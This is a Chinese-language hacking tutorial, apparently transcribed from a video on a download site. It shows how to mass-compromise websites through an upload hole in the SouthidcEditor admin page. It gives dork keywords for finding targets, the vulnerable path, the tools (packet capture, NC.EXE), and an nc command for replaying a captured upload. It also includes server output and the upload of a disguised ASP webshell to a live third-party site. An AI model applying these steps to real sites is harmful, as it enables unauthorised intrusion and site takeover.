大家好，我是小ぁ龙，今天给大家做的教程是利用新漏洞批量拿webshell

黑鹰确实是个不错的网站。。。

今天我们用到的工具有：

1：挖掘鸡1.1

2：抓包工具WSockExpert

3：NC.EXE

4：UltraEdit-32

好了，我们先来打开挖掘鸡

关键字:产品查询 在线调查 企业新闻

后缀名:/admin/SouthidcEditor/PopUp.asp

很多的，，我们来随便打开一个看看，晕，好慢哦，再来

恩，这个还可以，我们先传个小马，JPG的格式

这个时候就用到我们的抓包工具，，OK。成功上传了

这个时候就用到NC上传的知识了，，，这里我就不多介绍如何使用了

我告诉你们另一个教程，是低调小飞的作品

http://www.3800hk.com/donghua/c/19525.html就是这个了，你们可以去下载

晕，刚刚的路径忘了，从来一次 OK  

admin/SouthidcEditor/UploadFile/20071016203717294.jpg

我们把这个代码记下来，一会有用

NC上传大家看我演示，我不多说了 
 
NC的命令格式：nc 网站 端口 <你保存什么名就用什么.txt  回车

 上传表单已装入完成

</body>
</html>
<script language=javascript>parent.UploadSaved('/admin/SouthidcEditor/UploadFile
/2007101620413209.jpg');var obj=parent.dialogArguments.dialogArguments;if (!obj)
 obj=parent.dialogArguments;try{obj.addUploadFile('xiaoma.jpg', '200710162041320
9.jpg', '/admin/SouthidcEditor/UploadFile/2007101620413209.jpg');} catch(e){};hi
story.back()</script>

OK，完成了，这里我们在上面的代码里难得找ASP的小马，就用我们刚刚记录

下来的就OK了，，，

这个xiaoma.asp就是我们在1.txt里面改的xiaoma.asp

呵呵，，OK 进来了

好了，我们就不去搞他的服务器了。。。。

我的QQ是:399322096希望大家多多交流交流  o(∩_∩)o... 

我也是小鸟呢。。。。。拜拜。。。。。.

• [VIP 线路 - 电信高速下载][非高级会员不可下载]
• [VIP 线路 - 双线高速下载][非高级会员不可下载]

• ☉ 新漏洞批量拿webshell

• ☉ 由于私服程序的特殊性，它非常容易被杀毒误报，所以自2011年1月起本站所有软件都不在做杀毒查杀，请下载后自行检测查杀！
• ☉ 为了达到最快的下载速度，推荐使用 迅雷5 下载本站软件。
• ☉ 本站软件均为WinRAR5.6版本压缩，所以请一定升级到WinRAR5.6或最新版才能正常解压本站提供的软件!
• ☉ 如果您发现下载链接错误，或内容与分类不匹配，请点击报告错误。正确报错10个我们将送您VIP会员！
• ☉ 如发现本站软件需要解压密码，均为：www.987654321sf.com